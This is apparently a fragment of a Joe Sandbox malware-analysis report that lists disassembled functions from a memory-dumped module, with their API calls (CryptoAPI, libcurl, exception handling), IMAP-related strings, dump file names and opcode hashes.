                                                                                                                                  Function 6B8D7730 Relevance: 12.9, Strings: 10, Instructions: 382COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: alnum$alpha$blank$digit$graph$lower$print$space$upper$xdigit
                                                                                                                                  • API String ID: 0-2602438971
                                                                                                                                  • Opcode ID: 6879abfd637f03b6066af9e44716105dc3b733af9e86e795299ebecc185ae4ac
                                                                                                                                  • Instruction ID: 4b156e6cd480af8647b8fa7c74c623de29d6a7c88e5ff5be6c83cb6439b15ada
                                                                                                                                  • Opcode Fuzzy Hash: 6879abfd637f03b6066af9e44716105dc3b733af9e86e795299ebecc185ae4ac
                                                                                                                                  • Instruction Fuzzy Hash: 6CC1B42AB4C1894AC701CF7895A17FABBB7DF56358F5848EBC886CB242D61FD908C351
                                                                                                                                  Function 6B8F0C10 Relevance: 11.6, Strings: 9, Instructions: 334COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  • Mailbox UIDVALIDITY has changed, xrefs: 6B8F0F05
                                                                                                                                  • Select failed, xrefs: 6B8F0F62
                                                                                                                                  • OK [UIDVALIDITY %19[0123456789]], xrefs: 6B8F0EA0
                                                                                                                                  • Authentication cancelled, xrefs: 6B8F0DE7
                                                                                                                                  • STARTTLS denied, xrefs: 6B8F0D51
                                                                                                                                  • Access denied. %c, xrefs: 6B8F0E0B
                                                                                                                                  • CAPABILITY, xrefs: 6B8F0CED
                                                                                                                                  • PREAUTH connection, already authenticated!, xrefs: 6B8F0CCD
                                                                                                                                  • Got unexpected imap-server response, xrefs: 6B8F100E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Access denied. %c$Authentication cancelled$CAPABILITY$Got unexpected imap-server response$Mailbox UIDVALIDITY has changed$OK [UIDVALIDITY %19[0123456789]]$PREAUTH connection, already authenticated!$STARTTLS denied$Select failed
                                                                                                                                  • API String ID: 0-2459144044
                                                                                                                                  • Opcode ID: 72bbe854431989f235549f32fe48b693617f1902ae0c83819a3d417438f1ef54
                                                                                                                                  • Instruction ID: e0345d3838ceb31aeb59ed3a87245386d5a3e78aa4a3c12e39219a08e1e755fb
                                                                                                                                  • Opcode Fuzzy Hash: 72bbe854431989f235549f32fe48b693617f1902ae0c83819a3d417438f1ef54
                                                                                                                                  • Instruction Fuzzy Hash: 52B13074F082059FD7009F74DC82FAEB7ACEF45398F000979D91997281E73DA65A87A2
                                                                                                                                  Function 6B8F20A0 Relevance: 10.6, APIs: 7, Instructions: 60encryptionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 6B8F20C3
                                                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008002,00000000,00000000,00000000), ref: 6B8F20DD
                                                                                                                                  • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 6B8F20F7
                                                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 6B8F2111
                                                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000010,00000000), ref: 6B8F212B
                                                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 6B8F2139
                                                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6B8F2149
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3606780921-0
                                                                                                                                  • Opcode ID: 758966a6a404c74c0002fc1f0b54143afe1e2fb0f373f7e78a4190db69819f61
                                                                                                                                  • Instruction ID: 60010c4a5f631ecb5afbec8ed54000b410a150c3a27dc24a0adc3e15bb865c1a
                                                                                                                                  • Opcode Fuzzy Hash: 758966a6a404c74c0002fc1f0b54143afe1e2fb0f373f7e78a4190db69819f61
                                                                                                                                  • Instruction Fuzzy Hash: 7D113A74A44208BBEF20AF90CC4AF9DBB7CEB06700F1040A0FA14B61D4D7B9EA54DB24
                                                                                                                                  Function 6B8D8010 Relevance: 9.1, APIs: 6, Instructions: 118encryptionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040,?), ref: 6B8D803A
                                                                                                                                  • CryptImportKey.ADVAPI32(?,00000208,00000014,00000000,00000000,?,?,?), ref: 6B8D80E9
                                                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000,?), ref: 6B8D80F8
                                                                                                                                  • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000008,00000008,?), ref: 6B8D812D
                                                                                                                                  • CryptDestroyKey.ADVAPI32(?), ref: 6B8D8136
                                                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6B8D8141
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Crypt$Context$Release$AcquireDestroyEncryptImport
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3016261861-0
                                                                                                                                  • Opcode ID: a022eb0b8a6218708b13c42a92fdbcf5464a89ad9fe57b100844eeb5bda984dc
                                                                                                                                  • Instruction ID: 429d42d2a752aa4adf6526942cd42d154899d5609ea117bfcaba72bc767e560c
                                                                                                                                  • Opcode Fuzzy Hash: a022eb0b8a6218708b13c42a92fdbcf5464a89ad9fe57b100844eeb5bda984dc
                                                                                                                                  • Instruction Fuzzy Hash: 9D41B435904249AFEF11DFA8C846BEEBFB5EF1B300F105095E564A7381C736A50ADB60
                                                                                                                                  Function 6B8FA790 Relevance: 8.0, Strings: 6, Instructions: 501COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$+$<$GMT
                                                                                                                                  • API String ID: 0-3646017816
                                                                                                                                  • Opcode ID: a85ed697f5c3e7b9a0b639c96d6739b42c53ea316cbc8bebae64c41073a5b5e6
                                                                                                                                  • Instruction ID: 9f6d12aba28e34f0b617bb323aa74d79b393fc7c5470f665f95d250f17f3bf28
                                                                                                                                  • Opcode Fuzzy Hash: a85ed697f5c3e7b9a0b639c96d6739b42c53ea316cbc8bebae64c41073a5b5e6
                                                                                                                                  • Instruction Fuzzy Hash: 3802D371E042188FCF04CEBCD8516DDB7F9EF893A4F15866AE825EB380D73998468B50
                                                                                                                                  Function 6B8F21C0 Relevance: 6.0, APIs: 4, Instructions: 37encryptionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 6B8F21DC
                                                                                                                                  • CryptGetHashParam.ADVAPI32(00000010,00000002,?,00000010,00000000), ref: 6B8F21F6
                                                                                                                                  • CryptDestroyHash.ADVAPI32(00000010), ref: 6B8F2204
                                                                                                                                  • CryptReleaseContext.ADVAPI32(00000010,00000000), ref: 6B8F2214
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Crypt$Hash$Param$ContextDestroyRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2110207923-0
                                                                                                                                  • Opcode ID: 39b6a85f0724f676bf80479b919f4b5a232bd7f00dd398f22fbac918943bfeb0
                                                                                                                                  • Instruction ID: 801e817f15d1454c6abe50467d4199bbb08c7d23a95d939d9d94fd7101302371
                                                                                                                                  • Opcode Fuzzy Hash: 39b6a85f0724f676bf80479b919f4b5a232bd7f00dd398f22fbac918943bfeb0
                                                                                                                                  • Instruction Fuzzy Hash: 70F04974644209FBEF20DF90CD4AF9ABBBCEB06B41F104854FA65A7180D774EA00AB60
                                                                                                                                  Function 6B92EFE1 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6B92F0D9
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6B92F0E3
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6B92F0F0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                  • Opcode ID: effda95143ecc0effc7d5e167d383ebd54f496cb73127df1a5b7e7509d57a19f
                                                                                                                                  • Instruction ID: e68af20aeccea9964a0a22dd249479312d8a09c90d2f30da64dfb1b41197b4fa
                                                                                                                                  • Opcode Fuzzy Hash: effda95143ecc0effc7d5e167d383ebd54f496cb73127df1a5b7e7509d57a19f
                                                                                                                                  • Instruction Fuzzy Hash: 9831E375D1522CABCB21DF64DC8979CBBB8BF08314F5081EAE81DA7250EB349B818F44
                                                                                                                                  Function 6B92C43E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,6B92C43D,?,00000000,?,?,?,6B9284AA), ref: 6B92C460
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,6B92C43D,?,00000000,?,?,?,6B9284AA), ref: 6B92C467
                                                                                                                                  • ExitProcess.KERNEL32 ref: 6B92C479
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                  • Opcode ID: bb80fe08e93f756d3163ec92896e77cff555a76d19e87281f72938865cce2148
                                                                                                                                  • Instruction ID: 32005557354aa54205d7f7cc964698dfa56c8e33c62b4c5dfede2b3743b4829b
                                                                                                                                  • Opcode Fuzzy Hash: bb80fe08e93f756d3163ec92896e77cff555a76d19e87281f72938865cce2148
                                                                                                                                  • Instruction Fuzzy Hash: 96E0EC31414518BFCF116F65C959F593B79EB46B46F108424F81986135CB39D981DB80
                                                                                                                                  Function 6B8F1170 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 218COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000005,%lx,00000000,?,?), ref: 6B8F12F9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintf
                                                                                                                                  • String ID: %lx
                                                                                                                                  • API String ID: 1809024409-1448181948
                                                                                                                                  • Opcode ID: 0faff4a5a5893fe5ec3896254927b7c48ce81e0ddf68de8122eab59951e43d8b
                                                                                                                                  • Instruction ID: 7efd1477baff933f1a476871c6971e6d6c4967117ca1efa472ce7e131d8f4c03
                                                                                                                                  • Opcode Fuzzy Hash: 0faff4a5a5893fe5ec3896254927b7c48ce81e0ddf68de8122eab59951e43d8b
                                                                                                                                  • Instruction Fuzzy Hash: B5712A71E0416A8BCB10DEBCC4803ADB7A6EF863A4F144769D469DB6C4E739994BC780
                                                                                                                                  Function 6B8F2160 Relevance: 3.0, APIs: 2, Instructions: 22encryptionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 6B8F2173
                                                                                                                                  • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 6B8F218C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Crypt$AcquireContextCreateHash
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1914063823-0
                                                                                                                                  • Opcode ID: 7c5d1299678abab20b80c597a97486dba63159c023c695e25b3ba40ef155e6ac
                                                                                                                                  • Instruction ID: 74ff77fa6f9d741071a7ccecae139a8dc67324c955a73036a15af5a08effa962
                                                                                                                                  • Opcode Fuzzy Hash: 7c5d1299678abab20b80c597a97486dba63159c023c695e25b3ba40ef155e6ac
                                                                                                                                  • Instruction Fuzzy Hash: 7FE01735384714BBFA306A41DC46F9A77ACAB06B90F204421F759BA0C4C7A5F5008BAC
                                                                                                                                  Function 6B92BCF0 Relevance: 1.8, APIs: 1, Instructions: 274COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?), ref: 6B92BF1D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                  • Opcode ID: 7f4e4821c6ba8e7fb6b70928494adb3d281252058f646108259b702704c1c206
                                                                                                                                  • Instruction ID: db951772555d10c4bceb3b623119615a7502b99641676a4c7bc08c0ca4bf290b
                                                                                                                                  • Opcode Fuzzy Hash: 7f4e4821c6ba8e7fb6b70928494adb3d281252058f646108259b702704c1c206
                                                                                                                                  • Instruction Fuzzy Hash: CBB11831A206098FD715CF28C486B957BF0FF45364F258698E9A9CF2A5C339E992CF40
                                                                                                                                  Function 6B8F21A0 Relevance: 1.5, APIs: 1, Instructions: 10encryptionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 6B8F21B1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CryptDataHash
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4245837645-0
                                                                                                                                  • Opcode ID: 41adfc8c744df09728e23df63f022f1a201a707340929262624dd207725d9149
                                                                                                                                  • Instruction ID: 23095eea38683d46a43521affa9637d2f66d26903c0011e6276a7f1c96de8a00
                                                                                                                                  • Opcode Fuzzy Hash: 41adfc8c744df09728e23df63f022f1a201a707340929262624dd207725d9149
                                                                                                                                  • Instruction Fuzzy Hash: B3C00236144208BBCF115F84DC45E997BA9AB09711F048050BA1C4A161C772E560AB84
                                                                                                                                  Function 6B92FBD1 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                  • API String ID: 0-595813830
                                                                                                                                  • Opcode ID: 6d7d0627847cbd4960f2c3e44d0b2b6ea7f59e67cffa1cf3326c4a13ac241387
                                                                                                                                  • Instruction ID: 89b4508061fd4d0e1eba718a6f89056640c4143c593ee6db2ef4c846c9735d31
                                                                                                                                  • Opcode Fuzzy Hash: 6d7d0627847cbd4960f2c3e44d0b2b6ea7f59e67cffa1cf3326c4a13ac241387
                                                                                                                                  • Instruction Fuzzy Hash: B0E02B3398462473C72031D19C05FAD7B94CBB07F6F004276FE0855200A57EC851C2E0
                                                                                                                                  Function 6B920050 Relevance: .1, Instructions: 76COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                  • Instruction ID: 33cb8780c8d766ce3e30ce5728ea9f34cb4f3022964ae1b3a176afc12aaf182a
                                                                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                  • Instruction Fuzzy Hash: 20110877AE014243F308893DD4B47ABB7ADFBC7225B2842EAD1A14B65CD53BE145D600
                                                                                                                                  Function 6B8D7380 Relevance: .0, Instructions: 42COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9c68a8d4a0846ebc4b09b0a145e38f1195cbc43887bcb385cbd8187a09426d5f
                                                                                                                                  • Instruction ID: 5ddaa9cefb2b781c62aa4ba1c7314ca29963bb3d2801084d0bc99cd37caa46e9
                                                                                                                                  • Opcode Fuzzy Hash: 9c68a8d4a0846ebc4b09b0a145e38f1195cbc43887bcb385cbd8187a09426d5f
                                                                                                                                  • Instruction Fuzzy Hash: B7F0BE2610292007EF12582D60C1AF3A78BCBE6924AE264A1988C439D2865F340FD2E4
                                                                                                                                  Function 6B931C01 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
